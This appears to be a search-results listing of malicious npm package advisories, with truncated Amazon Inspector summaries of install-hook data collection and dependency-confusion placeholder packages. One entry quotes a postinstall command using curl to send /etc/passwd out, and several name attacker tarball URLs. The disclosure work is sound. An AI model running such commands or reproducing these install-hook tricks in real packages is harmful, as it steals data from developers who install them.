9492 matches found
MAL-2026-5421 Malicious code in @nstrlabs/sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a0b1375de7b44594cd3760efb91cb94c8c8b7137322f4597114e314ce5e14e45 On npm install, package.json runs preinstall: node index.js || true, unconditionally executing index.js. The script collects host identity fields...
MAL-2026-5412 Malicious code in @klapp-kyc/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ca32e3aa7685d93e36eca726e08096bd0c5ba425172ef254fdf769cc09b46887 On npm install, the package's preinstall hook executes node index.js, which collects the installer's hostname, OS username, current working directory...
MAL-2026-5417 Malicious code in @klapp-sca/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 495f510483f297a56d545e8555db20eb54569f904bfd71853e54a18d89812cb0 package.json declares "preinstall": "node index.js || true", so on every npm install the bundled index.js runs automatically and collects os.hostname...
Malicious code in @klapp-sca/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 495f510483f297a56d545e8555db20eb54569f904bfd71853e54a18d89812cb0 package.json declares "preinstall": "node index.js || true", so on every npm install the bundled index.js runs automatically and collects os.hostname...
Malicious code in @klapp-login-platform/native-sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3b3bc8633d15b44abc90074d3362fd9399f53d10a88e24264caee9d924a72bb6 On npm install, the package's preinstall lifecycle hook runs node index.js, which collects installer-side identifiers — os.hostname,...
Malicious code in @klapp-login-platform/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ffe05a6af27bd4b583c0284a40129eb63f4dcb4a6197e74195a8bb85bf71d1e7 On npm install, the package's preinstall lifecycle hook executes index.js, which collects the installer's hostname, username, package install path...
MAL-2026-5456 Malicious code in via-city-tools-m-particle (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bc5c4f690e0399edc4408e7729291803db7916ed764bcfe16988f4cdccd5cfc1 The package exports an empty object module.exports = and has no functionality of its own. Its only substantive effect is to declare a dependency on...
MAL-2026-5454 Malicious code in ui-ng-components (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 198750c8e5d6f4d8a3f3f788a2fd9286f43b5a447bb0e3495b50663c44ddd2a7 Package [email protected] is an empty shell index.js exports , no author, no description, no functionality with a single dependency declared as...
Malicious code in ui-ng-components (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 198750c8e5d6f4d8a3f3f788a2fd9286f43b5a447bb0e3495b50663c44ddd2a7 Package [email protected] is an empty shell index.js exports , no author, no description, no functionality with a single dependency declared as...
Malicious code in uipath-sugar-sell (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 70cd5d70323e92395a2ea8f61a4089f1cca94e4bb81a7cad1375ae47d3461e6f Package [email protected] exhibits the canonical dependency-confusion shape: an internal-sounding name targeting a UiPath/SugarSell namespace,...
MAL-2026-5455 Malicious code in uipath-sugar-sell (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 70cd5d70323e92395a2ea8f61a4089f1cca94e4bb81a7cad1375ae47d3461e6f Package [email protected] exhibits the canonical dependency-confusion shape: an internal-sounding name targeting a UiPath/SugarSell namespace,...
Malicious code in privacy-sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5c92b5d6dae289f8667ca24f2a941473b65e560f6937874f68ff26ed24d58969 [email protected] is a hollow wrapper index.js is module.exports = , blank description, blank author whose sole runtime dependency is declared as a...
MAL-2026-5451 Malicious code in privacy-sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5c92b5d6dae289f8667ca24f2a941473b65e560f6937874f68ff26ed24d58969 [email protected] is a hollow wrapper index.js is module.exports = , blank description, blank author whose sole runtime dependency is declared as a...
Malicious code in commons-ui-styles (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8b9fb701d18bde61d1dc783f0575a4d83bc0eba2653bd0832d0fc26bc9e85b48 [email protected] is an empty placeholder package index.js exports , description/author blank, version bumped to 99.9.1 — the classic...
MAL-2026-5437 Malicious code in commons-ui-styles (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8b9fb701d18bde61d1dc783f0575a4d83bc0eba2653bd0832d0fc26bc9e85b48 [email protected] is an empty placeholder package index.js exports , description/author blank, version bumped to 99.9.1 — the classic...
MAL-2026-5448 Malicious code in mazemap (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 751317dcad79cec866b8dc69cd60b39e3be8e1bcc45746039835b04ce32445b0 package.json declares its only dependency ltidisafe as a direct HTTPS tarball URL https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.0.2.tgz...
MAL-2026-5447 Malicious code in localization-lib (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bf143361939feffe7099c14acc7cf41a401681481e932e15d6054dde49e88f94 [email protected] is an empty shell package: index.js is module.exports = and package.json has no description or author. Its dependencies...
MAL-2026-5429 Malicious code in @shell-landing/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577 On npm install, the package's postinstall hook runs node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd'...
MAL-2026-5452 Malicious code in shopify-app-bridge-internal (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b21c63417fe3a82fd514d0af7c913fb3c1cd62915839dc8910483fb6484bbbd9 The package's preinstall lifecycle script in package.json runs unconditionally on npm install and issues an HTTPS GET to...
Malicious code in @sourceflow-uk/sourceflow-tracker (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c5bcccc37c380ce54f5bfc2bc2311fbefb6ebc3400a397cbc4afc2188fb3c11d package.json declares a dependency ltidisafe whose version specifier is the raw URL https://storage.googleapis.com/lscunpentest/packuxfoundry.tgz — a...